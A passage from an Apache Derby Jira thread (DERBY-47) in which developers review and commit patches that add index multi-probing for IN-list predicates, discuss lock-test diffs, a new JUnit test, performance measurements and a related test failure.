implement the Comparable interface, I hope that reviewers can speak up. If
it comes down to it I can always add a simple sort method to MultiProbeTSCRS
and just use that.
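The Comparable wrapping described in item 3 boils down to something like the following sketch (class names here are hypothetical; Derby's real code lives in iapi.types.DataType, whose compare() throws a checked exception):

```java
// Sketch of wrapping an existing three-way compare() method in
// Comparable.compareTo() so that the JVM's built-in sort can order
// the values.
abstract class OrderableValue implements Comparable<OrderableValue> {

    // Pre-existing comparison: negative, zero, or positive; may fail
    // for values that cannot be compared.
    abstract int compare(OrderableValue other) throws Exception;

    @Override
    public int compareTo(OrderableValue other) {
        try {
            return compare(other);
        } catch (Exception e) {
            // Mirrors the patch's choice for insane mode: treat
            // unorderable values as equal rather than let the checked
            // exception escape (a sane build would assert instead).
            return 0;
        }
    }
}

// Minimal concrete type so the wrapper can be exercised.
class IntValue extends OrderableValue {
    final int v;

    IntValue(int v) {
        this.v = v;
    }

    @Override
    int compare(OrderableValue other) {
        return Integer.compare(v, ((IntValue) other).v);
    }
}
```

With this in place, `java.util.Arrays.sort()` orders an array of these values directly, which is exactly the "just let the JVM do the sort" convenience described above.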
As with all preceding patches, this patch should not have any functional effect on Derby processing because the new behavior depends on probe predicates, which do not yet exist. I have not yet had a chance to run derbyall as a sanity check, but plan to do so before committing. In the meantime, questions/comments/feedback on exec_v1.patch as attached would be much appreciated.
I was reading through d47_mp_codeGen_v1.patch, and the
new getMultiProbeTableScanResultSet() method struck me as
somewhat awkward in having 26 arguments to the method. I see
you haven't actually implemented this method yet (or maybe you have;
I'm a patch-or-two behind), so maybe it's possible to explore why
we ended up with 26 arguments here?
> maybe it's possible to explore why we ended up with 26 arguments here?
Good question, Bryan. The relevant code in codeGen_v1.patch is as follows:
+ /* If we're going to generate a list of IN-values for index probing
+ * at execution time then we push TableScanResultSet arguments plus
+ * two additional arguments: 1) the list of IN-list values, and 2)
+ * a boolean indicating whether or not the IN-list values are already
+ * sorted.
+ */
+ if (genInListVals)
{
+ numArgs = 26;
What that comment does not say is that the reason we use TableScanResultSet arguments plus 2 is that the new result set, MultiProbeTableScanResultSet, extends TableScanResultSet and depends on TableScanResultSet to do most of the work. Therefore we need all of the usual (24) arguments for TableScanResultSet, plus two additional arguments for logic specific to multi-probing. The latest patch, d47_mp_exec_v1.patch, includes the new MultiProbeTableScanResultSet class, which hopefully shows how things are expected to work.
> (or maybe you have; I'm a patch-or-two behind),
Oops! My apologies. For some reason I took your previous comment to mean that you had already looked at the various patches up to and including codeGen_v1, and that you didn't have any suggestions. I see now that you were (perhaps?) indicating that you were in the process of looking at the patches but were not yet done.
Sorry for rushing on this one. I'll let the exec_v1 patch sit for a while (at least until Monday) to give you (and any other developers who may be in a similar situation) ample review time. I'll post again before I commit and if you have any feedback or else would like a few more days, feel free to say so.
I appreciate you looking at these patches and didn't mean to hurry or otherwise overlook your comments. Take all the time you need, and please continue to ask any questions you may have.
Thanks again for your time!
Thanks Army for the good explanation. I didn't realize that the calls to this 26-argument
method are generated. That makes a big difference; I was worried about the complexity
of human beings writing and maintaining code which called the 26-argument method, but
if it's only called by generated code it's a totally different story.
I don't think you're rushing. Please keep on with the process as you've been doing it; if I
come up with anything of substance we can take a look at it at that time.
Bryan Pendleton (JIRA) wrote:
> I finally got around to reading through the patches. I haven't actually
> run any of the code, just given the patches a close reading
Thank you very much for taking the time to do such a thorough review, Bryan. I definitely appreciate the feedback. My attempted answers are below, but if anything is still unclear, please do not hesitate to ask again. Better to get this right the first time.
> [...]
If we assume that we do in fact have a situation where "relop is null but in-list is not null", then pred.isRelationalOpPredicate() will, as you said, return false. That means that "!pred.isRelationalOpPredicate()" will return true, and since we are using a short-circuited OR operator, I don't think we would ever get to the pred.getRelop() call in that case, would we?
The intent was that we only get to the second part of the OR if we know for a fact that pred.getRelop() will return a non-null value. And if "pred" is a relational op predicate (i.e. if the first part of the OR evaluates to "false") then that should always be the case. It is of course possible that I missed something and that the code doesn't follow the intent; please let me know if you can think of such a case...
> 2) I spent some time studying the code in PredicateList.java which manipulates
> IN list operator predicates, and got a bit twisted around.
[ snip code fragment ]
> My naive reaction to code like this is "shouldn't this be handled in
> pred.getSourceInList()"?
Good point. When I was making the changes I wrote "getSourceInList()" specifically for the new probe predicates; I was just leaving the existing InListOperatorNode logic as it was. But you're right, it's probably cleaner to expand that method to cover the "old" IN-list cases, as well. I will look into this for a follow-up patch.
> Can you help me understand why are there these two different ways to get
> the InListOperatorNode for a predicate (via getSourceInList() and via
> getAndNode.getLeftOperand() ),
The former (getSourceInList()) was added to handle DERBY-47 probe predicates while the latter (getAndNode.getLeftOperand()) was already there for handling the "normal" (pre-DERBY-47) InLists. But you're right, it might be good to combine the two--I'll try to do that.
> [...]
Great catch! When I first wrote the DERBY-47 changes I had all of the probing logic inside the TableScanResultSet class, and thus the additional arguments were always generated, even in cases where no probe predicates existed. I later realized that this was too much overhead since most TableScanResultSets will probably not be doing multi-probing. So I refactored the code and created a new result set, MultiProbeTableScanResultSet, which is only generated when probe predicates exist. But I forgot to remove the corresponding logic from the generateInListValues() method, hence the "else".
So you're absolutely right: the "else" clause can be removed here and the code can be cleaned up accordingly. I'll address that in a follow-up patch.
> [...]
This is just habit more than anything. A lot of the optimizer-related work that I've been doing requires the removal of certain predicates from predicate lists at various points in the code, and in that case reverse traversal is better (because removal of elements from the rear does not require adjustments to the loop index). So I often write loop iteration with backwards traversal out of sheer habit, even when removal of predicates is not happening. If you think this makes the code more confusing or less intuitive I have no problem with switching to forward traversal.
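For the curious, the habit comes from removal loops like this hypothetical one, where traversing backwards means a removal never shifts an element the loop has yet to visit:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class ReverseRemovalSketch {

    // Remove every even number from the list. Because we iterate from
    // the rear, list.remove(i) only shifts elements at indexes > i,
    // all of which have already been visited, so the loop index needs
    // no adjustment after a removal.
    public static void removeEvens(List<Integer> list) {
        for (int i = list.size() - 1; i >= 0; i--) {
            if (list.get(i) % 2 == 0) {
                list.remove(i);
            }
        }
    }

    public static void main(String[] args) {
        List<Integer> nums = new ArrayList<>(Arrays.asList(1, 2, 3, 4, 5, 6));
        removeEvens(nums);
        System.out.println(nums); // [1, 3, 5]
    }
}
```

A forward-traversing version would have to decrement (or not advance) the index after each removal, which is exactly the bookkeeping the backwards loop avoids.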
Short answer is that I don't know what the commented-out code is for, and my guess is that yes, it can (and should) be cleaned up. But I frequently comment on other people's patches that they should refrain from making unrelated "cleanup" changes as it makes the patches harder to review, so I thought maybe I should follow my own advice.
Feel free to commit this two-line cleanup as a separate patch if you'd like--or I can do it myself. Either way, so long as it's a separate commit, I think that's a good idea.
> [...]
There is an existing test case in lang/inbetween.sql that has such a test for "normal" (pre-DERBY-47) IN-list processing. The query in that case has 4056 values (constants) in it.
I was also looking at the repro attached to DERBY-47, which generates and executes IN-lists with 2500 and more values. I'd like to pull out the relevant pieces and include them in a new JUnit test as a way to verify that things work for large IN lists when multi-probing is in effect, as well. That's still a forthcoming patch. For the record, though, I ran the repro on a database with 100,000 rows in it and a single IN-list of 2500 values, and everything worked fine--even when multi-probing was in effect. This is as I would expect since the code to generate the IN-list is the same before and after my changes.
> [...]
Great observation.
> [...]
This is a very valid point. I've been focusing on the first goal, but you're right, the above change is perhaps too costly. I'll look into remedying this with a follow-up patch...
Thank you again for these excellent review comments. I really (really) appreciate the extra pair of eyes and the great suggestions. As I said above, if any of the above answers are unclear or unsatisfactory, please ask again--I'll try to explain whatever it is that may not make sense.
PS I plan to commit the exec_v1 patch later today (Monday) unless I hear objections from anyone...
Committed d47_mp_exec_v1.patch with svn 517470:
URL:
Attaching d47_mp_preprocess_v1.patch, which is (finally) the patch that actually creates "probe predicates" during preprocessing, thus allowing the code changes in all previous patches to take effect. Once this patch is committed Derby will start re-writing IN lists as probe predicates and, if the optimizer thinks it is best to do so, will start doing index "multi-probing" at execution time to avoid excessive scanning. The changes in this patch affect "preprocessing" logic as follow:
1. Replaces "A" with "B", where "A" is existing logic that creates a BETWEEN
node for IN-lists containing all constants, and "B" is new logic that
creates a "probe predicate" for IN-lists containing all constants and/or
parameter nodes. The probe predicates are then used throughout optimization,
modification of access paths, code generation, and execution time (as
appropriate) in the manner described by previous patches.
2. Adds some additional logic to OrNode preprocessing to allow the conversion
of queries like:
select ... from T1 where i in (2, 3) or i in (7, 10)
into queries that look like:
select ... from T1 where i in (2, 3, 7, 10)
This is really just an extension of the existing logic to transform a
chain of OR nodes into an IN-list.
3. Adds logic to PredicateList.pushExpressionsIntoSelect() to correctly
copy "probe predicates" so that the left operand (column reference)
is pointing to the correct place when we do static pushing of one-
sided predicates (which is what a "probe predicate" is).
4. Adds a new method to ValueNodeList that is used for checking to see if
a list of IN values consists solely of constant and/or parameter nodes
(there are no other expressions or column references).
I'm also attaching a corresponding patch, d47_mp_masters_v1.patch, which contains all of the diffs caused by the new multi-probing functionality. As is typical with tests that print out query plans, a simple change in the execution-time behavior can lead to massive diffs. I manually looked at all of the diffs in the masters_v1.patch and it is my belief that all but one of them are acceptable and expected given the changes for this issue. The one exception is for store/readlocks.sql, which is a test about which I know very little. My guess (or perhaps more accurately, my hope) is that this readlocks diff is okay, but it would be great if someone who knows more about it could verify.
Note that I've separated preprocess_v1.patch from masters_v1.patch for ease of review, but they both need to be committed at the same time in order to avoid failures in the nightly regression tests.
As always, I'd appreciate it if anyone has the time look these changes over and make comments. If there are no objections I plan to commit these two patches Wednesday afternoon (March 14th, PST).
Remaining tasks once preprocess_v1 is committed:
- Address the (excellent) review comments raised by Bryan in one or more
follow-up patches.
- Add test cases to verify that Derby is now behaving as desired in the
face of IN list restrictions on columns with useful indexes.
- Post some simple numbers to show the improvement that I see when running
Derby47PerformanceTest.java (attached to this issue) before and after
the changes for this issue. Also, discuss a couple of areas to investigate
for DERBY-47 (i.e. things to consider as separate Jira issues).
I'm hoping to have most of this work posted by the end of the week, but of course that all depends on the feedback I receive and the amount of other "stuff" that comes up between now and then.
Attaching the readlocks diff with more context to hopefully help in reviewing...
Hi Army, I had a look at the preprocess and master patches and they look
good to me. Here's a couple small thoughts I had which you might want to
consider down the road.
0) You are right about the compound IF statement that we discussed in the
previous set of comments. I misread the logic, and I agree that there is
not any NPE hole there. Thanks for the further explanation.
As I read the code near that comment, it didn't seem that you were actually
depending on the IN-list having more than one value. Rather, you were
choosing a data structure which could handle multiple values, but which can
handle a single value just as well.
But I thought I'd mention it just to be sure.
Does such a query generate and use the new style Multi-Probe processing?
3) Do you have any test cases in which the IN-list predicate references a
column in a UNION or a UNION view, thus requiring pushing the IN-list
> predicate down and pulling it back up?
5) I looked at the updated masters; to my eye they show that the new probe
predicate is working, and the optimizer is choosing to use index-to-base
processing for these predicates rather than the formerly-chosen table
scans, so this looks great to me.
6) I have no guidance to offer regarding the readlocks diff, sorry. Is
the only indication that the new probing code has been chosen the use of
the index in place of the table scan?
>)
Yes, an IN-list can only have a single value. However, if such an IN-list occurs we will convert it into an equality predicate as part of the first "if" branch in the preprocess() method:
/* Check for the degenerate case of a single element in the IN list.
 * If found, then convert to "=".
 */
if (rightOperandList.size() == 1)
...
Thus we won't ever get to the code referenced above. But you're right, it might be good to add an explanatory comment to explain this.
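The degenerate-case rewrite is simple enough to sketch outside of Derby. The following is an illustrative stand-in (these class and method names are hypothetical, not Derby's actual AST node types):

```java
import java.util.List;

// Illustrative sketch of the degenerate-case rewrite: an IN list with
// exactly one value behaves like an equality predicate, so preprocessing
// rewrites it before any probing logic runs. These classes are
// hypothetical stand-ins, not Derby's actual AST node types.
public class InListRewrite {

    interface Predicate {}

    record InListPredicate(String column, List<?> values) implements Predicate {}

    record EqualityPredicate(String column, Object value) implements Predicate {}

    // Rewrite "col IN (v)" to "col = v"; leave larger IN lists untouched.
    static Predicate preprocess(InListPredicate in) {
        if (in.values().size() == 1) {
            return new EqualityPredicate(in.column(), in.values().get(0));
        }
        return in;
    }

    public static void main(String[] args) {
        Predicate single = preprocess(new InListPredicate("a", List.of(5)));
        Predicate multi  = preprocess(new InListPredicate("a", List.of(5, 7)));
        System.out.println(single instanceof EqualityPredicate); // true: rewritten to "="
        System.out.println(multi instanceof InListPredicate);    // true: kept as IN list
    }
}
```

Because the single-value case is rewritten first, the probing code can safely assume the data structure it builds holds one or more values.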
>.
A few test cases for this kind of query already exist in lang/inbetween.sql and also in lang/subquery.sql. So I did not add any new test cases with my changes. Is there anything in particular you think could be problematic here?
> Does such a query generate and use the new style Multi-Probe processing?
No, it does not. Multi-probe processing only occurs if the IN-list is solely comprised of constant and/or parameter nodes. A subquery is neither constant nor parameter, hence no multi-probing will occur. The code for this is in the preprocess() method of InListOperatorNode:
else if ((leftOperand instanceof ColumnReference) &&
rightOperandList.containsOnlyConstantAndParamNodes())
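A minimal sketch of that eligibility check, using hypothetical node classes rather than Derby's actual ValueNode hierarchy:

```java
import java.util.List;

// Sketch of the eligibility rule quoted above: multi-probing is only
// considered when every element of the IN list is a constant or a
// parameter marker. The node classes here are hypothetical stand-ins
// for Derby's ValueNode hierarchy.
public class ProbeEligibility {

    interface ValueNode {}
    record ConstantNode(Object value) implements ValueNode {}
    record ParameterNode(int position) implements ValueNode {}
    record SubqueryNode(String sql) implements ValueNode {}

    // Mirrors the role of containsOnlyConstantAndParamNodes(): any other
    // node type (e.g. a subquery) disqualifies the list from probing.
    static boolean containsOnlyConstantAndParamNodes(List<? extends ValueNode> list) {
        for (ValueNode n : list) {
            if (!(n instanceof ConstantNode) && !(n instanceof ParameterNode)) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        System.out.println(containsOnlyConstantAndParamNodes(
            List.of(new ConstantNode(5), new ParameterNode(1))));                // true
        System.out.println(containsOnlyConstantAndParamNodes(
            List.of(new ConstantNode(5), new SubqueryNode("SELECT x FROM t")))); // false
    }
}
```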
> 3) Do you have any test cases in which the IN-list predicate references a
> column in a UNION or a UNION view, thus requiring pushing the IN-list
> predicate down and pulling it back up?
I added a few, simplified test queries for this situation to lang/inbetween.sql as part of d47_mp_addlTestCases.patch (under the heading "Nested queries with unions and top-level IN list"). There are also a handful of queries in lang/predicatePushdown.sql that include IN lists in addition to equality predicates. Feel free to comment if you think more testing should be done here...
>.
Oops, good catch.
Just a typo; I will try to fix this up.
> 5) I looked at the updated masters; to my eye they show that the new probe
> predicate is working, and the optimizer is choosing to use index-to-base
> processing for these predicates rather than the formerly-chosen table
> scans, so this looks great to me.
Thank you for taking a look at these--this was an unexpected but very welcome review!
>?
This had occurred to me, as well, but then I realized that in all of the test cases the MultiProbingTableScanResultSet shows up as the child of an IndexToBaseRowResultSet, which I think means it doesn't actually get printed in the query plans (only the info for the IndexToBaseRowResultSet is printed). This is similar, I think, to BulkTableScanResultSet, which is not printed in query plans, either (I don't think...I believe the only way to tell is by looking at the fetch size).
> Or is the only indication that the new probing code has been chosen the
> use of the index in place of the table scan?
Right now I think the only way to tell is to look at the use of index and the number of rows visited/qualified: if we used an index but did not do multi-probing, we will probably see far more rows visited than if we used multi-probing (that won't always be the case, but is generally true). Perhaps work to add an explicit indication of multi-probing to the query plan can be handled as a separate enhancement?
These are great observations and great questions--thank you for posing them! And if you have any others, please continue to ask. I'm definitely grateful for the feedback...
I took a look at the diffs in readlocks and I believe all are "correct" with respect to your changes. It looks to me like there is an existing bug not affected by your code; see case 6 below. The readlocks test runs the same set of tests through multiple
setups, varying isolation level, row size, and unique vs. non-unique index. In all cases the diffs you are seeing are due to
a test of locks gotten from walking a cursor down the result set from: 'select a from a where a = 5 or a = 7'. As described, it is expected that your IN logic change should apply to this query when there is an index on a. I have described what I think is happening in the diffs below; the diff line notation comes from an svn diff after applying the master patch posted to
DERBY-47
to a current codeline.
1) @@ -4946,7 +4946,7 @@^M
o diff ok
o before change first next would bulk load all rows leaving a "scan lock"
on the last page (3,1). Now on first next code does a probe for the
5 from the (a=5 or a=7), so first lock query shows scan lock on (2,1)
associated with 5. There are no real row locks as this is read
uncommitted test.
2) @@ -8103,6 +8103,7 @@^M
@@ -8112,6 +8113,7 @@^M
o diff ok, shows 1 more row lock after each next in an expected OR case
o before change first next would bulk load all rows and by time lock
query is executed all locks would be released due to read committed.
Now because of probing we only get locks as we probe each value and
test shows lock is held during next call and then released when we
next to the next value.
3) @@ -8956,6 +8958,7 @@^M
@@ -8965,6 +8968,7 @@^M
o diff ok, same reasoning as 2
4) @@ -11255,7 +11259,8 @@^
@@ -11265,6 +11270,7 @@^M
o diff ok, same reasoning as 2 - row numbers are different from 2 because
of different padding in test table.
5) @@ -12101,6 +12107,7 @@^M
@@ -12110,6 +12117,7 @@^M
o diff ok, same reasoning as 4
6) @@ -14746,7 +14754,6 @@^M
o I think there is a bug in existing code, the incremental diff looks ok.
o there should not be any locks left after the scan_cursor is closed in
read committed, but there are at line 14762 of the original test.
7) @@ -15752,7 +15759,6 @@^M
o same as 6
8) @@ -18421,9 +18427,8 @@^M
o same as 6
9) @@ -19421,7 +19426,6 @@^M
o same as 6
10) @@ -21779,8 +21783,6 @@^M
o diff ok!!
o this is a good test that shows that the new code only visits the 2 rows
of the or clause and does not get locks on any other rows under
serializable with a unique index.
The old code shows it scanning the range and unnecessarily
locking an extra row.
11) @@ -21791,7 +21793,6 @@^M
o diff ok
o same as 10
12) @@ -21799,7 +21800,6 @@^
o diff ok
o same as 10
13) @@ -22639,8 +22639,6 @@^M
o diff ok
o not as good a test as 10. Because of previous key locking and the very
small data set both before and after we lock the same number of rows.
Diff does show difference in processing between before and after. If
there had been more than one row between 5 and 7 with the non-unique
index it would have shown less rows locked under new code vs. old code.
Adding a test for "IN(1, 7)" would show this off. If you are going to
add new test I would suggest checking in current set of diffs and then
adding separate test as it is easier to identify diffs from
new tests.
14) @@ -24974,11 +24972,9 @@^M
o diff ok
o same as 13
15) @@ -25831,8 +25827,6 @@^M
o same as 13
In my writeup on the diffs, ignore the comments about there being a possible bug. I incorrectly thought those cases were
read committed cases but they actually were repeatable read cases. I was searching for the wrong string to determine where I was in the test.
All the diffs look fine and expected with Army's changes.
Thanks again for the excellent review, Mike.
Unless I hear otherwise I plan to commit the preprocess patch later today, after incorporating Bryan's most recent comments. I will then work on the follow-up patch(es) to address Bryan's original set of review comments (thanks Bryan!).
And finally, I will try to add a new test to verify the functional changes. That said, I was hoping to add a new test to the regression suite based on Derby47PerformanceTest.java as attached to this issue. However, I just noticed that the attachment does not grant license to ASF for inclusion in ASF works.
James Synge, are you willing to grant such rights for the test program that you attached? If so, can you re-attach the file and check the appropriate box on the "Attach File" screen?
This is the same as the file I attached on 2006-09-06, but now with the license granted to ASF.
I made some slight modifications to the preprocess patch in accordance with Bryan's review comments, and then committed with svn #518322:
URL:
More specifically, preprocess_v2 differs from preprocess_v1 in that it:
1 - Adds a comment to help clarify what happens in the case of an IN-list with a single value in it.
2 - Renames "beon" to "bron" in OrNode.java to reflect the fact that it is a BinaryRelationalOperatorNode, not a BinaryEqualityOperatorNode.
derbyall ran cleanly on Red Hat Linux with ibm142.
Thanks again to Bryan and Mike for the reviews.
Attaching d47_mp_cleanup_v1.patch, which is a patch to address the review comments made by Bryan on 11/Mar/07 11:37 AM. In particular this patch does the following:
1 - Changes Predicate.isRelationalOpPredicate() so that it just calls
the already existing method "isRelationalOperator()" on the left
operand of the predicate's AND node. I.e.:
- return ((getRelop() != null) && (getSourceInList() == null));
+ return andNode.getLeftOperand().isRelationalOperator();
I completely forgot that the "isRelationalOperator()" method already
existed, even though I myself made probe-predicate-based changes to
that method as part of d47_mp_relOpPredCheck:
public boolean isRelationalOperator()
{
-    return true;
+    /* If this rel op is for a probe predicate then we do not call
+     * it a "relational operator"; it's actually a disguised IN-list
+     * operator.
+     */
+    return (inListProbeSource == null);
}
As a result of those changes we can now just call that method when
checking to see if a predicate is a relational op predicate. This
ultimately comes down to a simple check for a null variable in
BinaryRelationalOperatorNode, as seen above.
I believe this change addresses Bryan's comment #7, which pointed
out that the old code:
return ((getRelop() != null) && (getSourceInList() == null));
seemed a tad expensive since it was replacing a simple call to
"relop != null". The new code (with this patch) is much more
comparable to the "relop != null" check in terms of "work" that
it does (we have an additional call to getLeftOperand(), but
that's about it).
2 - Inspired by the "isRelationalOperator()" method defined in ValueNode
and used above, I added a similar method, "isInListProbeNode()",
to ValueNode, as well. The default case returns "false", while
BinaryRelationalOperatorNode returns true if it has a source IN-
list associated with it:
+ /** @see ValueNode#isInListProbeNode */
+ public boolean isInListProbeNode()
+ {
+     return (inListProbeSource != null);
+ }
Then I added a corresponding method called "isInListProbePredicate()"
to Predicate.java. This method allows for simple (and relatively
cheap) checking of a predicate to see if it is an IN-list probe
predicate. There are several places in the code where we would
attempt to retrieve the underlying source IN-list (via a call to
"getSourceInList()") just to see if it was non-null. All of those
occurrences have now been replaced by a call to the new method on
Predicate.java. I think this is a cleaner and cheaper way to
go about it.
3 - Modifies Predicate.getSourceInList() to return the underlying
InListOperatorNode for probe predicates AND for "normal"
IN-list predicates (i.e. an IN-list that could not be
transformed into a "probe predicate" because it contains
one or more non-parameter, non-constant values).
This then allowed for some cleanup of the code mentioned in
Bryan's comment #2. Some of the logic for that code was
specifically targeted for the old rewrite algorithm (use
of a BETWEEN operator), so I fixed it up and added comments
as I felt appropriate.
I also added a second version of getSourceInList() that takes a
boolean argument; if true, then it will only return the source
IN list for a predicate if that predicate is an IN-list
probe predicate.
4 - Changes PredicateList.generateInListValues() to account for the
fact that it only ever gets called when we know that there is
a probe predicate in the list. This addresses Bryan's review
comment #3.
5 - Shortens a couple of lines in FromBaseTable that were added with
earlier patches but were longer than 80 chars. Also rewrites
one Sanity check in that class to avoid construction of strings
when no error occurs (per recent discussions on derby-dev).
I ran derbyall and suites.All with ibm142 on Red Hat Linux with no new failures. Feedback or further review of these changes is appreciated. I'll plan to commit on Monday if I don't hear any objections.
Many many thanks again to Bryan for his time and suggestions!
Thanks for all the attention to detail, Army! The mp_cleanup_v1 patch looks very clean to me.
Thank you for the review of the cleanup patch, Bryan! I will continue with my plan to commit that patch before the end of day on Monday if no other comments come in.
I'm also attaching here a (final?) patch for this issue: d47_mp_junitTest_v1.patch, which creates a new JUnit test based on the repro program attached to this issue (thanks James Synge!). The test creates the same kind of table and data that Derby47PerformanceTest.java creates, and then runs three types of queries with larger and larger IN lists. The three types of queries are:
1 - "Markers" : same as in James' program
2 - "Literals" : same as in James' program
3 - 'MixedIds": IN list has a combination of parameter markers and literals.
For each query we check to make sure the results are correct and then we look at the query plan to determine whether or not the optimizer chose to do multi-probing. If the results are incorrect or if the optimizer did not choose multi-probing then the test will fail.
The test determines that "multi-probing" was in effect by looking at the query plan and verifying two things:
1. We did an index scan on the target table AND
2. The number of rows that "qualified" is equal to the number of rows that were actually returned for the query. If we did not do multi-probing then we would scan all or part of the index and then apply the IN-list restriction after reading the rows. That means that the number of rows "qualified" for the scan would be greater than the number of rows returned from the query. But if we do multi-probing we will just probe for rows that we know satisfy the restriction, thus the number of rows that we "fetch" for the scan (i.e. "rows qualified") should exactly match the number of rows in the result set.
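The two conditions above can be sketched as a small predicate over the parsed plan statistics (ScanStats here is a hypothetical stand-in for the values the test parses out of Derby's runtime statistics output, not an actual Derby API):

```java
// Sketch of the two-part plan check described above. Multi-probing is
// inferred when (1) an index scan was used on the target table and
// (2) the scan qualified exactly as many rows as the query returned.
// ScanStats is a hypothetical stand-in for the values the test parses
// out of Derby's runtime statistics output.
public class MultiProbeCheck {

    record ScanStats(boolean usedIndexScan, long rowsQualified, long rowsReturned) {}

    static boolean looksLikeMultiProbe(ScanStats s) {
        // A plain index scan reads a range and filters afterwards, so it
        // usually qualifies more rows than the query returns; a probe
        // only fetches rows already known to satisfy the IN list.
        return s.usedIndexScan() && s.rowsQualified() == s.rowsReturned();
    }

    public static void main(String[] args) {
        System.out.println(looksLikeMultiProbe(new ScanStats(true, 3, 3)));       // true
        System.out.println(looksLikeMultiProbe(new ScanStats(true, 40806, 712))); // false: range scan + filter
        System.out.println(looksLikeMultiProbe(new ScanStats(false, 3, 3)));      // false: no index scan
    }
}
```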
I ran the new test using ibm142, ibm15, jdk142, jdk15, jdk16, and weme6.1 and it passed in all cases.
I also ran the new test against a build that I created before any of the
DERBY-47 changes were committed; as expected, the test failed because even though the optimizer did choose to use an index, it scanned a lot (thousands) of extra rows for that index.
Any reviews/comments on this new JUnit test are very much welcomed. In the absence of any feedback to the contrary, I'm thinking I'll commit this new test by the end of Monday, as well. And of course, comments/suggestions can still be made after that, if needed...
InListMultiProbeTest applied and built and passed in my environment. Looks good!
Thank you, Bryan, for taking a look at the new JUnit test and for verifying that it runs.
I committed the cleanup patch and the new JUnit tests with the following svn commits (respectively):
URL:
URL:
I'm marking the issue as "Resolved" in 10.3 since I believe this wraps up the changes for this issue. I plan to run some (simple) before-and-after numbers and post them tomorrow.
I will wait a few days to check for fallout and then I will close or re-open this issue accordingly.
For any of the people "watching" this issue, if you are willing and able to sync up with the latest trunk for testing only (do not use the trunk in production, nor on production databases!) and provide feedback on whether or not the changes for this issue address your concerns, that'd be great. If you are still experiencing problems even after these changes, you may need to file one or more additional Jira issues to address those specific problems. As it is, I think the work for this specific Jira issue is pretty much "done"...
Follow-up comments and feedback are, of course, always welcome and greatly appreciated.
Attaching a very simple document with some straightforward "before-and-after" measurements based on the Derby47PerformanceTest attached to this issue. I wrote this document pretty quickly so it's not very elegant, but it does show the improvement that I see from the
DERBY-47 changes. Here's the conclusion, pasted from the document:
<begin paste>
Conclusion:
From a "multi-probing" perspective these numbers show what we expect: namely, that we can save a lot of time by selectively probing an index for a list of values instead of scanning all (or large parts) of that index for a relatively small number of rows.
But there are a couple of areas that could use follow-up work. In particular:
1. As seen in this document, the compilation/optimization time for "Literals" is far larger than it is for "Markers". Since the "probe predicate" optimization in theory applies the same to both strategies, further investigation is needed to figure out what it is about "Literals" that makes for such a long compilation time. I do not currently have any theories as to what could be at the root of this. Note, though, that this relatively excessive compilation time was an issue even before the changes for
DERBY-47 were committed.
2. Not surprisingly, the costing logic for probing as implemented in
DERBY-47 is not perfect. It works great in situations where the IN list is significantly smaller than the number of rows in the table--e.g. we see good results for 100k rows.
My feeling is that any work related to investigation/resolution of these two issues can and should be completed as part of a new Jira...
<end paste>
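The tradeoff behind point 2 of the conclusion can be sketched with a rough back-of-envelope model (my own simplification, not Derby's actual cost formulas):

```java
// Rough back-of-envelope model of the tradeoff: k probes each descend a
// B-tree of height ~ceil(log_fanout(rows)), while a full index scan
// touches every leaf page. Probing wins only while the IN list stays
// small relative to the table. This is my own simplification, not
// Derby's actual cost formulas.
public class ProbeCostModel {

    // Approximate page reads for probing inListSize keys individually.
    static double probeCost(long inListSize, long rows, int fanout) {
        double height = Math.ceil(Math.log(rows) / Math.log(fanout));
        return inListSize * height;
    }

    // Approximate leaf pages read by a full index scan.
    static double scanCost(long rows, int rowsPerLeafPage) {
        return (double) rows / rowsPerLeafPage;
    }

    public static void main(String[] args) {
        long rows = 100_000;
        // Small IN list (10 values): probing reads far fewer pages.
        System.out.println(probeCost(10, rows, 100) < scanCost(rows, 100));     // true
        // Huge IN list (50k values): probing costs more than one full scan.
        System.out.println(probeCost(50_000, rows, 100) > scanCost(rows, 100)); // true
    }
}
```

This is why a costing model has to fall back to an ordinary scan once the IN list grows past the crossover point, and why imperfect costing around that point is plausible follow-up work.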
Updated copy of the before-and-after numbers. This one actually tells what the numbers in the tables mean.
Thanks for posting the measurement analysis, Army; it's good to see the numbers backing up
the results we hoped to see.
I agree that the two follow-up issues that you uncovered should be logged and pursued separately.
Army - Just FYI
In the Tuning Guide, the IN operator is mentioned in the optimization and query sections, as shown below:
DML statements and performance
Performance and optimization
Index use and access paths
Joins and performance
Derby's cost-based optimization
Locking and performance
Non-cost-based optimizations
Non-cost-based sort avoidance (tuple filtering)
The MIN() and MAX() optimizations
Overriding the default optimizer behavior
Internal language transformations
Predicate transformations
Static IN predicate transformations
Subquery processing and transformations
DISTINCT elimination in IN, ANY, and EXISTS subqueries
IN/ANY subquery transformation
It is not clear to me if the Optimization section needs to be updated with any info about improvements to the IN optimization.
But I wanted to provide you with this info so that you can decide.
Hi Army, I just checked in a converted JUnit test for the old distinct.sql. All the fixtures in the test had been working, until I updated to get the new RuntimeStatisticsParser so I could use it in the test, and then one fixture started failing with an ASSERT related to
DERBY-47. I was hoping that, if you have some spare time, you might be able to take a look at it and see if you can figure out what's going on a little quicker than I. Look for and uncomment the testResultSetInOrderWhenUsingIndex() in the new DistinctTest class. Pardon the confusing name; it's taken directly from the comment that precedes the old test in the .sql file, so I kept it as the method name for the test fixture.
The really confusing thing to me is why the identical 'prepare as ...' with an identical select statement isn't getting the assert when the .sql test is running under the old harness.
I've probably just missed something subtle from the old test, and maybe another pair of eyes will help me spot what that is.
Hi Andrew,
Thank you for reporting this! My guess is that the difference between the JUnit test and the old distinct.sql is the specification of certain properties for the old test--namely:
derby.optimizer.optimizeJoinOrder=false
derby.optimizer.noTimeout=true
derby.optimizer.ruleBasedOptimization=true
When I specified these three properties on the command line for the JUnit test, all fixtures ran as expected. I then narrowed the failure that you're seeing down to the "optimizeJoinOrder" property: if it's not specified--i.e. if optimization of join orders occurs "as normal", the test fails. It only passes if optimizeJoinOrder is false.
So that's good news for you--you know why the problem is occurring. And I think it means you found a bug somewhere with
DERBY-47, too...so thank you!
I will look into this...
Hah! I had already deleted all the properties files for the old tests in my client so it didn't occur to me to look there. A fortunate oversight, then, I suppose.
Two questions then
1. shall I open a new issue for the test failure? If so, I'll be glad to, or we can roll it in to
DERBY-2491.
2. should I add the other two properties to the new test run? Adding the noTimeout flag doesn't significantly increase the amount of time the test takes to run. I'm not clear on what the ruleBasedOptimization flag does. Does that instruct the optimizer to not attempt the normal cost-based optimization and only do some rule-based optimization? The test runs (and passes) in a normal amount of time with or without this property set and noTimeout = true.
